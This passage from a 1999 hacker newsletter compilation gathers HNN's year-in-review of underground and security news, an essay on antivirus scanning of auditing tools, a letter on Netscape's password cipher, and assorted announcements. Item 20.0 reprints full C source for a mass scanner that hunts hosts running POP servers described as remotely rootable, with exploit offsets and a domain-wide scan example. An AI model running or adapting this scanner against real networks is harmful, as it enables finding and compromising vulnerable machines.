for HNN and our ever continuing battle against Fear, Uncertainty, and Doubt (FUD). While some of our engagements with FUD have been successful, like the alleged moving of a British satellite, other battles like the numerous virus scares, were not. 1999 also saw some major events unfold in the underground community, from the exposure of Se7en as a fraud, to the removal and resurrection of Packet Storm Security, and the debacle of MTV. At the close of the year Kevin Mitnick is awaiting release while others take his place behind bars. Throughout 1999 HNN was the place on the net to get up to date breaking news on these stories. These top eleven stories of 1999 are not presented in any particular order. LoU China-Iraq War On December 29, 1998 the underground group Legions of the Underground declared an all out cyber warfare on information infrastructure of China and Iraq. They cited severe civil rights abuses by the governments of both countries as well as the sentencing to death of two bank robbers in China and the production of weapons of mass destruction by Iraq as the reasons for their declaration. By January 5th, 1999 a group known as spl0it and a group based in Poland said that would assist LoU in their cyber warfare efforts. On January 6th, 1999 Legions of the Underground released a statement contradicting their earlier statements that claimed that they never had destructive intentions and blame the media for letting this get out of hand. The retraction by LoU came to late. On the next day January 7th, 1999 an International Hacker Coalition including groups such as cDc, L0pht, CCC, 2600, Phrack, !HISPAHACK and others released a joint statement condemning the Legions of the Underground and their Declaration of War. By January 8, 1999 LoU was reeling from the overwhelming support of the joint condemnation of LoU's actions and released additional retractions of their declaration of war. On January 13, 1999 the Legions of the Underground told Wired magazine that the original press conference was a fake and that the people present during the press conference were spoofed. There is no evidence to support this but there is none to deny it either. Finally Optiklenz, a member of LoU, releases a statement on the view of what happened from the LoU perspective. LoU-China-Iraq War Histogram - Chronological Listing of Events HNN Archive for December 29, 1998 Transcript of IRC Press Conference with LoU LoU Declaration of War HNN Archive for January 6, 1999 International Hacker Coalition Joint Statement LoU Retraction of War Declaration Optiklenz Statement Hackers Move British Military Satellite This is one battle with FUD that we like to claim that we won. On March 1, 1999 The Sunday Business published a story that was later picked up by the Reuters wire service, that a British military satellite had been taken over by cyber attackers and was being held for ransom. The story itself lacked any sort of verifiable information and HNN called it into question immediately. By the next day spokes people from the British Ministry of Defense flat out denied that such a thing was even possible. HNN editor Space Rogue was a guest on the radio show "Off the Hook" to discuss this incident. Both ZDNet and MSNBC ran stories covering this non event crediting HNN for calling the story suspect. Bob Sullivan of MSNBC went so far as to label HNN "The Voice of Reason". HNN Archive for March 01, 1999 HNN Archive for March 02, 1999 Original Sunday Business Article Security Analysis of Satellite Command and Control Uplinks - Buffer Overflow Article by Brian Oblivion MSNBC ZD Net Off The Hook - March 02, 1999 episode Se7en Exposed An article written by Steve Silberman and published by Wired exposed Se7en (Christian Valor) and his single handed cracker crusade against pedophiles as a complete sham. Se7en succeed in creating a massive media hack as articles of his infamous exploits were published in Forbes, MSNBC, LA Times, Newsday and others over several months. Only one of the journalists that we know, Adam Penenberg, that had been duped by Se7en actually admitted his mistake and published a public apology. HNN Archive for February 8, 1999 Attrition.org - Evidence used against Se7en Wired Open letter from Adam Penenberg HNN: The Year in Review Page 2 John Vranesevich Shuts Down Packet Storm Security Probably the biggest story of 1999 was the actions of John Vranesevich, founder and administrator of AntiOnline, who was instrumental in getting the extremely popular web site Packet Storm Security shut down. As far as can be determined John Vranesevich discovered a private directory on Packet Storm that contained potentially libelous material about him and his family. Mr. Vranesevich did not contact the site administrator directly but instead sent an email to the administrators at Harvard University asking that the objectionable material be removed. Harvard responded by unceremoniously pulling the plug on the whole site. Once word of how and why Packet Storm had gone down a public outcry ensued. Mailing lists where started, people started an attempt to mirror the site, Ken Williams received numerous offer to host the site and Mr. Vranesevich became the whipping boy du jour. Because Mr. Williams was unable to access his web site, which was his senior project, he was forced to drop out of school. He later sold the web site to Kroll O' Gara and took a position at a major internet security company. HNN Archive for July 1, 1999 HNN Archive for July 2, 1999 Attrition.org - Examples of the supposedly libelous materials posted to Packet Storm Ken Williams Statement AntiOnline - John Vranesevich's Defense Letter from Harvard Ken Williams Response to Harvard Letter From Bronc Buster - Regarding the actions of Mr. Vranesevich ZD Net HNN Pulls Massive April Fools Joke It was meant as a simple joke, a simple April Fools Day prank, a reason to smile or to laugh. It turned into one of the biggest stories in the underground for 1999. At midnight EST on April 1, 1999 the main Hacker News web page was updated with what appeared as a web defacement. The page contained all the required elements of a defacement, poor spelling, hax0r speak, shout outs, etc... Many, many, bought the defacement hook line and sinker, HNN administrators even got personal phone calls to their homes at 8am to inform them of the defacement. Remember, even as recently as April web defacements were a relatively rare thing, not occurring by the dozens like they are today. Ahhhh, but the fun did not stop there. At Noon EST the HNN pranksters felt the unsuspecting public needed even more mayhem and hi jinx. The defaced page came down and the days news went up. The news contained stories such as Kevin Mitnick breaking out of jail by whistling a 300 baud carrier into a phone, L0pht Heavy Industries selling L0phtCrack for $1.2 billion to NAI, CERT going out of Business, and Microsoft buying Network Solutions for complete control of the Internet. Considering the volume of mail we received regarding these stories (some of which came from mainstream journalists) many many people believed them. Archive of HNN Defacement HNN Archive for April 1, 1999 PhoneMasters For some reason the mainstream media has really not paid attention to this story. Considering the level to which these crimes escalated and the methods and effort needed to catch the these crooks it is a wonder that there wasn't more media coverage. The FBI called them the 'Phone Masters' and labeled their crimes as one of the greatest cyber-intrusions of all time. Court records show that the Phone Masters had gained access to telephone networks of companies including AT&T Corp., British Telecommunications Inc., GTE Corp., MCI WorldCom (then MCI Communications Corp.), Southwestern Bell, and Sprint Corp. They broke into credit-reporting databases belonging to Equifax Inc. and TRW Inc. They entered Nexis/Lexis databases and systems of Dun & Bradstreet. They could eavesdrop on phone calls, compromise secure databases, redirect communications, they also had access to portions of the national power grid, and air-traffic-control systems. The FBI had to invent special equipment they called a 'data tap' specifically for this case and get special permission from DOJ to use it. It took several years of listening to phone calls to gather enough evidence for an arrest but on February 22, 1995 the FBI conducted a raid on three suspected members of the PhoneMasters. Other members of the group are thought to remain at large. Three members of the group pleaded guilty to federal charges of one count of theft and possession of unauthorized calling-card numbers and one count of unauthorized access to computer systems. The three where sentenced in October for 24 to 41 months in federal prison. What bothers us most about this story is that almost no mainstream media has reported on the story. The first mention we can find about the Phone Masters is from a local TV stations, WFAA in Dallas FortWorth back in the beginning of May. Phone Master Hacks - Buffer Overflow Article HNN Archive October 4, 1999 - PhoneMasters Plead Guilty Wall Street Journal - one of the few articles about this case Union Tribune - Another rare article that has a little bit more info. CNN - Tries to answer why the media missed the boat Aviary Mag - Interview with An Acquaintance of the Phone Masters MTV Serena Achtul host of MTV News and of a documentary style program known as 'True Life' wanted to do a show on 'hacking' and in particular a show about Kevin Mitnick. She was placed into contact with Emmanuel Goldstein of 2600 Magazine who organized several interviews for her. He spent a lot of time and effort in getting good people for her to talk to and they shot several hours worth of film. For one reason or another the Kevin Mitnick aspect of the show was cut out, so being a good sport Emmanuel directed Serena to the folks at L0pht Heavy Industries. The L0pht crew made time in their busy schedules to spend an entire day with Serana and her film crew explaining the finer points of what they do and explaining the difference between script kiddie defacements and true hacking. Again for some reason, this angle for the show was not to MTVs liking so they struck out on their own looking for whatever it was they wanted. They found Shamrock, the host of the Internet TV show devoted to hacking known as Pseudo. The result was a complete farce. Evidently Shamrock decided to take MTV for a ride and give them what they wanted, a story line straight out of the movie Hackers. The show did nothing to explain what hacking was all about and was far from a documentary. Needless to say many people are upset at MTV and others over this mess. Letters from HNN Viewers Letter from Emmanuel Goldstein Letter from Shamrock HNN: The Year in Review Page 3 Defcon VII and BO2K Defcon probably had the most mainstream media coverage of any hacker convention to date. With over 3000 attendees and over 200 press representatives present it was definitely one of the biggest conventions ever. With the release of Back Orifice 2000 from the Cult of Dead Cow the press was working at a fever pitch trying to cover the story even before the software was released. HNN spent quite a few days inebriated in Las Vegas while we tried to cover the happenings at Defcon. Some of the highlights included the BO2K launch presentation, complete with thumping techno and strobe lights, the ejection of Carolyn Mienel from the conference floor, and the defacement of the Defcon.org web page. When we returned we had over 1200 emails to answer and one pounding hang over. The media went nuts over the BO2K release, sparking debates on just what a virus is and what should be scanned. Network Associates claimed to be the first out of the gate with a patch for the program. Microsoft was even prompted to release a security bulletin. Also at Defcon, Zero Knowledge released 1000 beta copies of Freedom, L0pht Heavy Industries introduced the revolutionary new security tool AntiSniff, Bruce Schneier announced that PPTPv2 'sucks less', and Security Wizards released their Capture the Flag Logs. HNN Archive for July 9, 1999 - Press frenzy prior to con Defcon.org Defacement Mirror HNN Archive for July 13, 1999 - the Aftermath Defcon VII Review - Buffer Overflow Article The Back Orifice 2000 Controversy - Buffer Overflow Article How the Anti Virus Industry Works - Buffer Overflow Article AntiVirus scanning for potentially misused tools is a doomed security strategy. - Buffer Overflow Article Kevin Mitnick Kevin Mitnick's road has been a long and bumpy one that has stretched for several years, 1999 was no different. One small bright thing is that Kevin is scheduled to be released, finally, sometime early in 2000. In March the federal government succeeded in wearing Kevin down. He decided to plead guilty in the hopes to get his four year ordeal over with. Unfortunately he still had charges from the State of California to deal with. HNN Archive for March 29, 1999 On April 26th it was revealed that the companies supposedly hurt by theft of software by Kevin Mitnick never reported those millions of dollars in losses to the SEC as required by law. HNN Archive for April 25, 1999 Letters from companies estimating the amount of damages. June 4th was supposed to be the day in which Kevin was officially sentenced and so demonstrations to support Kevin were planned at federal courthouses across the country. Unfortunately the hearing was postponed at the last minute but the demonstrations continued. Folks in other countries joined in by protesting outside embassies, the New York demonstration hired a skywriter to write FREE KEVIN over Central Park, the Philadelphia demonstration made onto the local news and many online news agencies covered the San Francisco Demonstration, numerous other cities attempted to live web cast their demonstrations. HNN Archive for June 5, 1999 Press Release -Demonstration Announcement Picture of the Russian Demonstration On Kevin's fifth birthday behind bars the LA District Attorney graciously decided to drop the state charges against him. The DA claimed that the case had been mischarged. Finally on August 9th, after numerous delays, Kevin received his sentence of 46 months in prison with credit for time served. He will also be forced to pay $4125 restitution to the supposed victims in the case. Instead of halfway house as expected he was remanded to Lompac Federal Prison. HNN Archive for August 9, 1999 Much more in depth information regarding Kevin Mitnick, his current status and the historical significance of this case can be found here. FREE KEVIN Virus Scares 1999 was a banner year for viruses. Melissa, CIH, and numerous other viruses had the press working over time. The virus writers keep churning them out, the antivirus companies keep detecting them and the press was not far behind. Melissa seemed to be extremely virulent. By emailing 50 copies of itself after every infection it made it around the globe very quickly. It managed to jump the air-gap onto US governments SIPRNet and even made it on board ships in the Seventh Fleet. Numerous variants of Melissa surfaced with distributed DoS attack capability. Melissa was somehow traced through usenet to AOL and finally to David L. Smith who pleaded guilty to creating and releasing the virus. HNN Archive for March 31, 1999 - Melissa makes it to 7th Fleet, Kills Marines Email, DoS Variant Appears HNN Archive for April 2, 1999 - David Smith arrested and released on $100,000 bail HNN Archive for April 5, 1999 - Melissa jumps air-gap onto classified SIPRNet HNN Archive for December 12, 1999 - David Smith pleads guilty. CIH while not as prolific as Melissa was definitely more destructive. CIH or Chernobyl is triggered to release its payload on April 26th every year and it has been around for a while. It hit exceeding hard this year especially in the Far East. Its creator was traced back to Taiwan where he said he was sorry. HNN Archive for April 27, 1999 - CIH strikes worldwide HNN Archive for April 29, 1999 - CIH Author Identified. HNN Archive for May 12, 1999 - China Estimates 360,000 systems Damaged by CIH The Virus Community Speaks How the Anti Virus Industry Works - Buffer Overflow Article AntiVirus scanning for potentially misused tools is a doomed security strategy. - Buffer Overflow Article Ireland, Indonesia, China, Sweden, and Yugoslavia Government sanctioned cyber attacks seem to be all the rage these days. Some countries are openly announcing their plans to create offensive cyber warriors while others are claiming to have already suffered government sanctioned cyber attacks. In January a small ISP in Ireland, Connect Ireland, that hosts the top level domain for East Timor claimed that it had suffered a massive attack by Indonesian government forces. Indonesia of course denied the charges. HNN Archive for January 26, 1999 Newsweek claimed that President Clinton authorized a "top-secret" plan against Slobodan Milosevic. One part of this plan would use "computer hackers" to attack his foreign bank accounts. Newsweek went on to say that the report instructed the CIA to wage "cyberwar" against Milosevic. HNN Archive for May 24, 1999 HNN Archive for July 6, 1999 Yugoslavia Cut Off from the Net? - Buffer Overflow Article Sweden announced the formation of a cyber defense force. HNN Archive for July 14, 1999 Nobel Peace Prize laureate Jose Ramos-Horta claimed that hundreds of people around the world were poised to launch a cyber attack against Indonesia should there be any tampering in the election process for East Timor's freedom. No evidence was given for this cyber arsenal build up and no attack ever came. Connect Ireland, the ISP supposedly targeted by Indonesian forces earlier in the year asked that no internet attacks be launched. HNN Archive for August 20, 1999 Connect Ireland - response to Indonesian threats A Chinese military newspaper covering the activities of China's Peoples Liberation Army has called for the recruitment of 'civilian hackers' and for the training of 'cyber warriors' at Army schools. HNN Archive for August 4, 1999 We hope that this disturbing trend does not continue into the next year. It will be an extremely bad day when the internet is legislated as a weapon of war. @HWA 12.0 AntiVirus scanning for potentially misused tools is a doomed security strategy. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The Anti-Virus vendors seem to be taking on a larger role. Not only are they scanning for true viruses and trojan horses but any software that may potentially be misused, as long as it is not their own software. This activity does nothing to close the holes in your network but instead gives you a false sense of security. Buffer Overflow http://www.hackernews.com/bufferoverflow/ AntiVirus scanning for potentially misused tools is a doomed security strategy. By: Weld Pond, weld@l0pht.com L0pht Heavy Industries December 20, 1999 There is a growing trend with AntiVirus scanners today. The scanners are scanning for more and more software that does not contain virus or trojan code. The new category of software the scanners are looking for is common software that has the *potential* to be misused by malicious persons. Usually this software is in the security auditing tool, network monitoring, or remote control category. Corporate customers of AntiVirus software have requested that these potentially misuseable programs be flagged and, in some cases, "disinfected" by the scanning software. The AntiVirus vendors seem more than happy to comply. Even going so far as to label this new category of detected software as a "virus" or "trojan" when found, no matter how misleading to the user this label is. Another controvertial twist in this new AntiVirus category is the fact that the AntiVirus vendors do not scan for their own tools that fall into the new "potentially misusable program" categories. Symantec's Norton AntiVirus will scan for the remote control programs, NetBus or BO2K, but not the company's own PC Anywhere. Network Associates' McAfee VirusScan will detect the NT password auditing tool, L0phtCrack, but will not detect the company's own vulnerability auditing tool, Cybercop scanner, or their network sniffers, Sniffer Basic or Sniffer Pro. It is a fallacy that commercial tools are not misued by malicious individuals. They are usually available as free trial downloads or available on pirate software sites. However, the whole notion of protecting a network by scanning for potentially misuseable tools is a fallacy unto itself! Using AntiVirus client scanning technology to find programs that can exploit the security problems on a network is a losing battle. AntiVirus software can be turned off. New tools or new versions of older tools will soon become available. Other machines without AntiVirus software can be attached to the network. Machines can be booted with alternative OSes. You need to actually fix the network security problems! It is foolhardy to scan for tools that could exploit problems rather than just fixing the problems. This scanning scenario just gets OS and application vendors off the hook. Now they don't have to fix the problems. They will just rely on the AV vendors to scan for programs or code that can exploit the problems. Why fix, for example, Win 95/98 challenge-response network authentication? Each client on the network should be scanning for all known tools that can sniff the network or crack the passwords. Obviously this is not a good security model. Scanning for potentially misused tools is leading network security down the path to the horrible situation we have with mobile code sent through email or through the web. The current industry accepted solution is not to solve the problem with a proper security architecture for hostile mail or web content. But instead just scan for all *known* malicious mobile code. Ugh! The AntiVirus vendors have a vested interest in the status quo but this is not bringing the industry closer to a solution. To broaden this approach to cover network security problems is clearly heading in the wrong direction. Can you imagine a day when a vendor responds to an intranet security vulnerability by saying, "This is not a problem with our product. We do, as always, recommend that all customers keep their AV software updated." It is time to start making networks or computers secure without relying on the approach of client code scanning. A false sense of security is worse than known poor security. If your network security cannot survive well known tools being installed and executed then you need to start addressing your problems, not sweeping them under the rug. Weld Pond weld@l0pht.com @HWA 13.0 RST Sets the Record Straight ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by John Last week Reliable Software Technologies, Inc., released a new advisory regarding the storage of email passwords by Netscape. They took a lot of flak from people, including HNN, who thought this was an old problem being rehashed by RST for cheap publicity. RST would like to take a moment to sort out the details and explain their new advisory and the old problem. Letter from RST http://www.hackernews.com/special/1999/rst.html Reliable Software Technologies http://www.rstcorp.com Date: 12/19/99 21:57 Received: 12/19/99 22:04 From: John Viega, John@list.org To: contact@hackernews.com Hey, I believe that what HNN posted today about the Netscape thing is largely inaccurate. First, there are and have been two different ciphers in use in Netscape that are similar, but slightly different. The simpler one, which is a base 64 and an xor only (with potentially a pad), apparently made the rounds a year ago, and people did note that it looked similar on recent versions of windows. But it isn't the same right now. Maybe Netscape changed their cipher from last year, or perhaps it has been the same through the whole 4.0 series. I dunno, but at some point they did change it. I looked at the 2.0 series, the 3.0 series, and 4.6 + 4.7 on Windows. The 4.6 and 4.7 cipher is substantially different from the 2/3 cipher. The 2/3 cipher is the same as current versions of Unix and Mac. Let's face it... user habits are different on Windows than on Unix. Few if any people use NS to read mail on a Mac. Plus, Windows has a lot more dumb users. So we have defintely broken a different cipher. We didn't know that the older cipher was previously broken. When we talked to Netscape, they gave us no indication that it ever had been. In fact, they seemed to be indicating that they were crossing their fingers hoping that no one would target it. Also, the old attack wasn't very well publicized. Again, I suspect that NS new about the old attack, was glad it stayed low key, and quietly made the algorithm a bit harder on its flagship Windows version without making a real effort to fix the problem. The new cipher still does a base 64 encode and an XOR with a fixed key. However, it also does some bit permutations, and reads the bytes in reverse order. If you look at the same 7 char password encoded with the old algorithm and the new algorithm, you will notice that they aren't the same. You'll notice the "=" pad is at the front in the new kind, and comes last in the old kind. The strings will also look similar, but aren't the same thing reversed, or anything like that. It wasn't that much stronger, but they obviously hoped it would provide a bit more security. Funny, the MSDN developer's network talks about security, mentions that XOR is desirable, and suggests tricks like this to help improve the security of XOR. It's completely and utterly rediculous. So, to summarize so far, the cipher is exactly as complex as we said it was, and not "simpler than first thought". There's been some unfortunate confusion between their old cipher and their new one. It definitely would have been nice if we'd run across info on the old one before we talked to Netscape, or if they'd have told us about it, but those things did not happen. The next point I'd like to contend in today's HNN article is the quote "To Netscape's credit they are just conforming to the POP3 protocal which sends passwords in the clear anyway." First, the save password feature works w/ POP3 and IMAP. IMAP doesn't require you to send passwords in plaintext. If I recall correctly, there are a bunch of different authentication mechanisms. Of course, I don't know what NS uses or does not use. Second, I don't believe that just because a password is going to be sent in plaintext, you should make it even easier for people to get at it. Even if you can't raise the bar high enough that someone won't be able to jump it, you should raise the bar as high as you can. Why didn't Netscape just leave the password lying around in plaintext? Well, even really poor obfuscation is going to stop most computer illiterates from getting the password. They'll find it if it's in plaintext (though someone might have to tell them it's there). At many companies, it'd be that much easier to get your boss' mail password, etc. just because he left himself logged in. So basic obfuscation raises the bar a bit. But script kiddies can download software to decrypt the old passwords (we haven't seen anyone post such software for the new algorithm yet). Also, it's not too hard to embed code to collect such passwords in email attachments that show dancing pigs. In some older versions of Netscape, the password could be extracted remotely via JavaScript. For people who run both IE and Netscape, there is a current IE bug that will let people extract the ciphertext Netscape uses (Thanks to Richard Smith for that). More such holes might (probably) exist elsewhere. I think that the more difficult you make this, the better, even if the password is sent over the network in plaintext. Why? Because it raises the bar a bit more. I believe that fewer people have the skills to set up a sniffer, and mine the data it produces than can run code to email back encrypted passwords, and then run code to decrypt them. Plus, there are tools like antisniff that can make it harder to sniff. Plus, you have to wait around for the person to actually check his mailbox from that machine (which he or she might not even use anymore). It's not a much bigger bar, true, but I believe it's a bit bigger nonetheless. I've heard people argue that it is pointless for Netscape to use real encryption such as Twofish or 3DES and hide a key, because the key could be obtained through reverse engineering. Well, it's true that you could obtain the key that way. Again, I think it is a matter of raising the bar as high as you can. If you hide the key well, few people will be willing to go through the hassle of reverse engineering the code. Sure, it may eventually happen, but Netscape should hope that "eventually" at least buys them a little bit of time where they can really offer some security to people saving their passwords. There have been plenty of products that have gone several years with embedded keys that no one bothered to reverse engineer (at least, so far as the public knows). For most people, reverse engineering can be a huge time sink, and may not be worth the effort, especially when really good obfuscation is performed. There's generally always more interesting, lower hanging fruit to be picked. I know that I sure wouldn't have bothered to reverse engineer Netscape's algorithm if we couldn't break it by other means, and I believe a lot of other people feel the same way. Another sentiment I have heard a bit in the past couple of days is, "If you need access to run code on the machine for this exploit, who cares, since you've already compromised the machine?" Well, the primary response to this is that mail account info is often a quick gateway to other accounts on other machines. POP3 and IMAP accounts often check the same password file telnetd checks. Or, wu-ftpd, which you could use in conjunction w/ a recent buffer overflow to get a shell. Also, plenty of people use the same passwords for multiple accounts, PGP passphrases, whatever. They shouldn't, but they do anyway. John @HWA 14.0 Russian Politician Threatens Cyber Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by EvilWench Russian politician, Vladimir Zhirinovsky, has threatened to electronically steal money from Western bank accounts. When asked what he would do to celebrate if he wins an upcoming parliamentary election the maverick politician announced that he would unleash computer viruses on the West and steal their money. Reuters - via Excite http://news.excite.com/news/r/991219/18/russia-election-zhirinovsky Jubilant Zhirinovsky wants to hack Western computers MOSCOW (Reuters) - Russia's maverick politician Vladimir Zhirinovsky, whose ultra-nationalist bloc looks set to do well in a parliamentary election, said Monday he would celebrate by hacking into Western computers. Zhirinovsky's bloc was running at more than eight percent in early results compared with pre-election opinion polls which had given him some five percent.Asked by Reuters whether he would have a drink to mark his party's good showing, he said: "No. No way, we Russians don't drink any more. We now work on computers, we use computers to send viruses to the West and then we poach your money." "We have the best hackers in the world. We do not need to drink or smoke... we do not drink, smoke, have drugs and we don't have AIDS, that's what you have got in the West." Russia is a heavy drinking nation which is struggling to catch up with economically-advanced countries on the use of new technologies, such as the Internet, but a lack of resources and poor infrastructure confines progress to big cities. Zhirinovsky who has run and done reasonably well in all parliamentary and presidential elections since 1991 on a protest vote by lower stratas of the Russian society, is one of the most eccentric politicians with an acute political sense and bizarre sense of humour. He has thrown juice at an opponent in a live televised debate, promised to wash his boots in the Indian Ocean when Russia expands there and been involved in fist-fighting in the State Duma lower chamber of parliament. But at the same time, he has decided crucial votes in parliament in the Kremlin's favor and has developed a well organised party with solid assets. @HWA 15.0 PCR-1000 Control Suite Released by Ghetto.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Javaman After many hard hours of labor from Polywog and Javaman, Ghetto.org proudly releases it's first mainstream product, the PCR-1000 Control Suite. The PCR-1000 is a wideband, PC-controlled receiver whose only decent control software was Win 9x/NT based. Because of Ghetto.org, there is now a *nix solution. Currently the code only compiles under Linux, they are seeking assistance in porting to other platforms. Ghetto.org http://www.ghetto.org PCR-1000 Control Suite http://www.ghetto.org/projects @HWA 16.0 Nuclear Power Plant Y2K Readiness ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by ZapfDing A little paranoid about Y2K and whether that nuke plant down the street is ready? The Nuclear Regulatory Commission has released an interesting PDF file that lists the Y2K transition period for all the nuclear power plants in the world in relation to EST and UTC. Nuclear Regulatory Commission and Y2K http://www.nrc.gov/NRC/NEWS/year2000.html Global Y2K Plant Listing - PDF http://www.nrc.gov/IP/Y2K/yewstz.pdf @HWA 17.0 New E-zines Released ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by 1k Resistor and sony_103 Digital Defiance has done it again and come out with their second issue. They continue to run head strong with articles on house arrest devices as well as their feature of the month of HiCards free phone cards. The Venezuelan magazine Hven ezine issue #2 has also been released. Yes, it is in Spanish. Digital Defiance http://digital-defiance.hypermart.net/zine.html Hven ezine http://www.hven.com.ve @HWA 18.0 Digi.no publishes Script Kiddie Rant ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by aka Respected online Norwegian news source Digi.no has published an interview with a member of the group "Hackers Online Norway" known as Spectom. The interview claims that the group is planning to enter the stock market and is looking for new members. Members must pass a test of knowledge and break into a site for membership. (It is unfortunate that a respected magazine such as Digi.no would publish what appears to be the rantings of a wannabe script kiddie.) Digi.no - Norwegian http://www.digi.no/digi98.nsf/pub/dd19991218113200TKW2126192111 Anyone want to send in a translation of this? - Ed @HWA 19.0 w00w00 Con 1999 ~~~~~~~~~~~~~~~ Contributed by Duro w00giving99 is off to a great start. In case you haven't heard the w00 security development team is posting several vulnerabilities along with exploit code. It is said that on the year 2k they are going to release their best vulnerability along with the code to exploit it. The w00 team is up to #8 now. check out http://www.w00w00.org/advisories.html for all of the advisories. The w00 team is doing this in the hopes that the vendors will fix the problem. In the mean time script kids have fun! w00w00 Site: http://www.w00w00.org/ @HWA 20.0 pops.c popmail scanner by duro ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* POPScan QPOP/UCB/SCO scanner by duro duro@dorx.net takes list of ip's from stdin The hosts gathered by this scanner are almost 100% vulnerable to a remote root attack. The exploits used to root the vulnerable machines can all be found by searching bugtraq. UCB pop is 100% of the time vulnerable to the qpop exploit (it's a very old version of qpop). The QPOP version is filitered to make sure that non-vulnerable versions do not show up in the scan. Common offsets for the bsd qpop exploit are: 621, 1500, 500, 300, 900, 0 Example usage: ./z0ne -o ac.uk | ./pops > ac.uk.log & would scan ac.uk for vulnerabilities. much help from jsbach */ #include #include #include #include #include int ADMtelnet (u_long, int port); char domain[50]; int NUMCHILDREN = 150, currchilds = 0; /* change numchildren to taste */ char ip[16]; int temp1 = 0; void scan(char *ip); void alrm(void) { return; } main() { while( (fgets(ip, sizeof(ip), stdin)) != NULL) switch(fork()) { case 0: { scan(ip); exit(0); } case -1: { printf("cannot fork so many timez@!@^&\n"); exit(0); break; } default: { currchilds++; if (currchilds > NUMCHILDREN) wait(NULL); break; } } } void scan(char *ip) { char printip[16]; struct sockaddr_in addr; int sockfd; char buf[512]; bzero((struct sockaddr_in *)&addr, sizeof(addr)); sockfd = socket(AF_INET, SOCK_STREAM, 0); addr.sin_addr.s_addr = inet_addr(ip); addr.sin_port = htons(110); addr.sin_family = AF_INET; signal(SIGALRM, alrm); alarm(5); if ( (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1)) { recv(sockfd, (char *)buf, sizeof(buf), 0); if ( (strstr(buf, "QPOP") ) != NULL && (strstr(buf, "2.5")) == NULL && (strstr(buf, "krb")) == NULL) { checkos(ip,1); } if((strstr(buf, "UCB")) != NULL) checkos(ip,2); if((strstr(buf, "SCO")) != NULL) { strcpy(printip, ip); if ((temp1=strrchr(printip, '\n')) != NULL) bzero(temp1, 1); printf("%s: SCO Unix box running SCO pop.\n",printip); } } return; } // } checkos(char *ip, int spl) { int temp2; char printip[16]; unsigned long temp; temp = inet_addr(ip); temp2 = ADMtelnet(temp, 23); strcpy(printip, ip); if ((temp1=strrchr(printip, '\n')) != NULL) bzero(temp1, 1); if ((temp2 == 1)&&(spl==1)) printf("%s: OpenBSD box running vuln QPOP\n",printip); if ((temp2 == 1)&&(spl==2)) printf("%s: OpenBSD box running vuln UCB pop\n",printip); if ((temp2 == 2)&&(spl==1)) printf("%s: FreeBSD box running vuln QPOP\n",printip); if ((temp2 == 2)&&(spl==2)) printf("%s: FreeBSD box running vuln UCB pop\n",printip); if ((temp2 == 3)&&(spl==1)) printf("%s: BSDi box running vuln QPOP\n",printip); if ((temp2 == 3)&&(spl==2)) printf("%s: BSDi box running vuln UCB pop\n",printip); } int ADMtelnet (u_long ip, int port) { struct sockaddr_in sin; u_char buf[4000]; int dasock, len; int longueur = sizeof (struct sockaddr_in); dasock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); /* gimme a socket */ sin.sin_family = AF_INET; sin.sin_port = htons (port); sin.sin_addr.s_addr = ip; if (connect (dasock, (struct sockaddr *) &sin, longueur) == -1) return (-1); while (1) { memset (buf, 0, sizeof (buf)); if ((len = read (dasock, buf, 1)) <= 0) break; if (*buf == (unsigned int) 255) { read (dasock, (buf + 1), 2); if (*(buf + 1) == (unsigned int) 253 && !(u_char) * (buf + 2)); else if ((u_char) * (buf + 1) == (unsigned int) 253) { *(buf + 1) = 252; write (dasock, buf, 3); } } else { if (*buf != 0) { bzero (buf, sizeof (buf)); read (dasock, buf, sizeof (buf)); usleep(40000); if((strstr(buf, "OpenBSD") != NULL)) return 1; if((strstr(buf, "FreeBSD") != NULL)) return 2; if((strstr(buf, "BSDI") != NULL)) return 3; sleep (1); } } } return 0; } @HWA 21.0 Cypherpunks meeting announcement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Join us for the first Cypherpunks meeting of the new millennium! NEXT Meeting: Meeting Page: SF Bay Area Cypherpunks (80th Chairborne Regiment) 15 Jan 2000 * MEETING PRE-ANNOUNCEMENT The January 2000 SF Bay Cypherpunks meeting will be on January 15th! General Info: For those of you who plan ahead: the January 2000 cypherpunks physical meeting will be on January 15th, the THIRD SATURDAY of January, instead of the usual second Saturday. This will align our meeting with the RSA Data Security Conference in San Jose the following week (registration starts on 16 Jan). Many of the usual cypherpunk suspects from around the planet will be in town. Location: The meeting will be held in San Jose, a few blocks from the RSA conference site. Location details to follow. Time: Meeting time is 12-6pm, followed by a group dinner nearby from 6-8pm. Speakers: (so far...) Cypherpunk Projects: general "Works-in-Progress" session Bruce Schneier (Counterpane) Austin Hill (Zero Knowledge) Paul Holman (Shmoo Group) Adam Shostack (Zero Knowledge) Mystery Guest More Volunteer Speakers are welcome: Send us your agenda proposal (one brief paragraph, include amount of time needed, e.g. 5/15/30 minutes). RSA Conference Vendor Expo Free Registration The show floor will be open January 18th and 19th at the San Jose Convention Center. Onsite Expo registration is $50, but it's FREE if you register NOW at: . Also, you can register for the conference or the IBM gala party at that site. @HWA 22.0 Microsoft security bulletin MS99-046 Windows NT 4.0 SP4 or SP5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Re-release of Microsoft Security Bulletin MS99-046 -------------------------------------------------- In November, we withdrew a previously released patch that improved the randomness of TCP initial sequence numbers in Windows NT 4.0. The patch was withdrawn because it contained the same regression error that was present in Windows NT 4.0 SP6. We have eliminated the regression error and re-released the patch. The security bulletin has been updated and is available at 